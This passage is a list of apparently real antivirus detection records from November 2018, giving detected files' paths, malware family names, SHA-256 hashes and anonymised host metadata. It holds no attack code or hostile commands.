  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\40i51wb1a24\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:34:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nscEE3B.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='H:\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T11:57:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baixaki_psafe-total_vlxczc.exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_psafe-total_VlXCzC.exe', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='bcab7c74b26935b6fabadd0c116714eacacba5cd9921c71ec255ec6a9dc00f7f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T00:13:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095132-501a71a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095132-501A71A1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='frogadv.exe', filepath='\\?\\J:\\العاب2\\الضفدعة الجديدة\\FrogADV.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='9d0e970001b56f8f5ced0be3ea381550d84ec194a2dd12dcfcaa424271622a09', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:43:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194224-2d2c7fa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194224-2D2C7FA4', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:04:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T14:30:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='b0dc31bd73c67f690775047ff0ba3bba16a49474383cec166fa822e0049e63a0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:24:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-192747-6bc2f300', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc727c94\\AVSCAN-20181104-190515-975C53E3\\AVSCAN-20181104-192747-6BC2F300', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:27:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130731-065fa0fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130731-065FA0FB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msi_kombustor_setup_2.5.0.exe', filepath='\\\\?\\D:\\korisni programi\\=) stress test & monitoring prog\\streess\\MSI_Kombustor_Setup_2.5.0.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='09587aeade1b22e0ee1732c8a31307b6e57f386853589f197741ac856652e3d1', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:28:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\aol\\2\\1\\1\\2\\2\\1\\1\\1\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T19:04:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner_dd592a05.exe', filepath='F:\\bin_3rdparty_1_8_1_6\\bin_3rdparty\\ewbf\\miner_dd592a05.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T19:52:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152551-f98b3975', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eba24208\\AVSCAN-20181104-141832-F573C2FF\\AVSCAN-20181104-152551-F98B3975', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='08cce85de6b7808af17666c9689a16e424590770839d9ee966d73b9580abc94f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:24:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='log.exe', filepath='\\\\?\\C:\\Windows\\System32\\JLXVLV\\LOG.exe', filesize=2752000, name='SPR/Tool.Monitor.Gen.#M1.#R1'), hash='78c50eac5ef1e2f2556efc7bf652caea34183377a21a938301f9223799907f2f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131216-1be27b82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131216-1BE27B82', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:12:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pbackup.exe', filepath='C:\\Program Files (x86)\\PRMT8\\BACKUP\\PBackup.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='5a158cc2f43778bfce63f74d3d87b4398c1c2b0de57304d14f299457b4a815f8', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:08:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140332-f9e91529', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140332-F9E91529', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:48:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024169', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024169', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:45:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T00:52:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='services.vir', filepath='C:\\Users\\X\\AppData\\Roaming\\Windows_System\\services.VIR', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-k secsvcs', country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T01:45:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clydemosaic.dll', filepath='C:\\CSC e-Governance Services India Limited\\digipay\\ClydeMosaic.dll', filesize=1088000, name='W32/Ramnit.CD.#M1.#R1'), hash='83b6ef7aca927b82aa241e9a929c8a5eec13fc89b27a16e05e0a7888a1b419bd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T04:59:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='E:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='5b732c79191398dfbe9b19c87e319935abd7d721db205828ed9cb5d6e5365bfc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe15_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T14:27:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131626-2ec06489', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131626-2EC06489', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cdbxp_setup_4.5.0.3717_x64.exe', filepath='\\\\?\\E:\\Stv\\cdbxp_setup_4.5.0.3717_x64.exe', filesize=5444000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='8346b1a405555f136366addd4f342d2be5c07bb5e203a2b0728ea4dd66392803', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:08:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe147_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe147 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T12:05:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132023-40b2f5fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132023-40B2F5FC', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8dea', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8dea', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152714-19e40a12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5221eeda\\AVSCAN-20181104-152607-1099E0A6\\AVSCAN-20181104-152714-19E40A12', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:27:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124712-877a8d95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-124712-877A8D95', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:47:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121809-5490c22f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_364e103e\\AVSCAN-20181104-121610-422C33EE\\AVSCAN-20181104-121809-5490C22F', filesize=372000, name='TR/Trash.Gen.#M1.#R1'), hash='bcac16c5541da822a60e6eb356604c9894322094bf237a8b609cde8902e25cec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:18:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182650.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp104\\A0182650.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T03:12:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:40:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T11:36:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='samsung_sm-j106h_pt.htm', filepath='C:\\Program Files (x86)\\Octoplus\\Octoplus_Samsung\\Manuals\\Samsung_SM-J106H_PT.htm', filesize=388000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='84137e1b618665e8423bbd9f0c6a93a17d2ca49447f65a6ef640cdd4199f20e8', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-04T20:13:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:45:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200826-29900cdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-200336-F55350DA\\AVSCAN-20181104-200826-29900CDB', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:08:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b5e0499d414fbaede45bc88483aabd98ed37fdc05508cfd8b727ce0322afa1f6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B5E0499D414FBAEDE45BC88483AABD98ED37FDC05508CFD8B727CE0322AFA1F6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b5e0499d414fbaede45bc88483aabd98ed37fdc05508cfd8b727ce0322afa1f6', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:35:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d762', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d762', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184203-eab514d8', filepath='D:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-184128-DCB02857\\AVSCAN-20181104-184203-EAB514D8', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:40:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134810-34ad717f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbc916c1\\AVSCAN-20181104-134639-23D9CC14\\AVSCAN-20181104-134810-34AD717F', filesize=64000, name='W97M/Dldr.Agent.AM.7117126.#M1.#R1'), hash='60c2aa4d30f1a1d84e03cde89c9d16de70071f0bed798a95e309218a8ee64997', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:48:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1b3d1ed4.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1b3d1ed4.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214130-17d955b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214130-17D955B3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135634-580855f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c92004a4\\AVSCAN-20181104-135555-5244B37F\\AVSCAN-20181104-135634-580855F0', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:56:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='openvpn.exe', filepath='C:\\Program Files (x86)\\VPN Unlimited\\openvpn.exe', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='239f2c85506cf6e390ba59748b42df87f954d10ce36651c6a852bdd0614dbe71', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:OTbXg\\\\\\/gmnEWe7BXK.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T06:10:17Z'), dt=datetime.date(2018, 11, 4)),
